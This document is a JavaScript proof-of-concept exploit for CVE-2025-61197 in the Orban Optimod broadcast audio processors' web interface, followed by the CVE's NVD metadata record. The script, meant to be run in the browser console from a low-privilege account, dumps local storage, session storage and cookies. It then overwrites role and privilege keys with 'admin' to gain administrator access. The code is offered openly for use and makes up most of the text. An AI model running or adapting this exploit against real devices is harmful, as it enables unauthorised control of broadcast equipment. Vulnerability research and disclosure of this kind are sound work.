CVE-2025-61197

/* CVE-2025-61197 - Orban Optimod Privilege Escalation PoC * Vulnerability: Client-side storage of privilege/role information * Affected: Orban Optimod 5950/5950HD/5750/5750HD/Trio v1.0.0.33 (System v2.5.26) * * Usage: Execute this JavaScript in the browser console after logging in * with a low-privilege account on the Orban Optimod web management interface. */ // Step 1: Inspect current client-side storage to identify privilege-related keys function inspectStorage() { console.log("=== LocalStorage Contents ==="); for (let i = 0; i < localStorage.length; i++) { const key = localStorage.key(i); const value = localStorage.getItem(key); console.log(`${key}: ${value}`); } console.log("=== SessionStorage Contents ==="); for (let i = 0; i < sessionStorage.length; i++) { const key = sessionStorage.key(i); const value = sessionStorage.getItem(key); console.log(`${key}: ${value}`); } console.log("=== Cookies ==="); console.log(document.cookie); } // Step 2: Escalate privileges by modifying client-side storage function escalatePrivileges() { // Common privilege-related keys to modify const privilegeKeys = [ 'role', 'userRole', 'privilege', 'privilegeLevel', 'isAdmin', 'admin', 'user_type', 'userType', 'access_level', 'accessLevel', 'permissions', 'auth_role' ]; // Attempt to modify localStorage entries privilegeKeys.forEach(key => { if (localStorage.getItem(key) !== null) { localStorage.setItem(key, 'admin'); console.log(`[+] Modified localStorage.${key} -> admin`); } if (sessionStorage.getItem(key) !== null) { sessionStorage.setItem(key, 'admin'); console.log(`[+] Modified sessionStorage.${key} -> admin`); } }); // Attempt to modify cookies document.cookie.split(';').forEach(cookie => { const [name, value] = cookie.trim().split('='); if (privilegeKeys.includes(name)) { document.cookie = `${name}=admin; path=/`; console.log(`[+] Modified cookie ${name} -> admin`); } }); } // Step 3: Reload the page to apply privilege changes function applyAndReload() { escalatePrivileges(); console.log("[*] Reloading page to apply escalated privileges..."); location.reload(); } // Execute the exploit chain console.log("[*] CVE-2025-61197 Exploit - Orban Optimod Privilege Escalation"); inspectStorage(); escalatePrivileges(); // Uncomment the line below to automatically reload and apply changes // applyAndReload();

{"cve": {"id": "CVE-2025-61197", "sourceIdentifier": "[email protected]", "published": "2025-10-06T14:15:42.900", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue in Orban Optimod 5950, Optimod 5950HD, Optimod 5750, Optimod 5750HD, Optimod Trio Optimod version 1.0.0.33 - System version 2.5.26 allows a remote attacker to escalate privileges via the application stores user privilege/role information in client-side browser storage"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:L", "baseScore": 8.9, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-602"}]}], "references": [{"url": "https://github.com/giulioschiavone/Vulnerability-Research/tree/main/CVE-2025-61197", "source": "[email protected]"}, {"url": "https://www.orban.com/", "source": "[email protected]"}]}}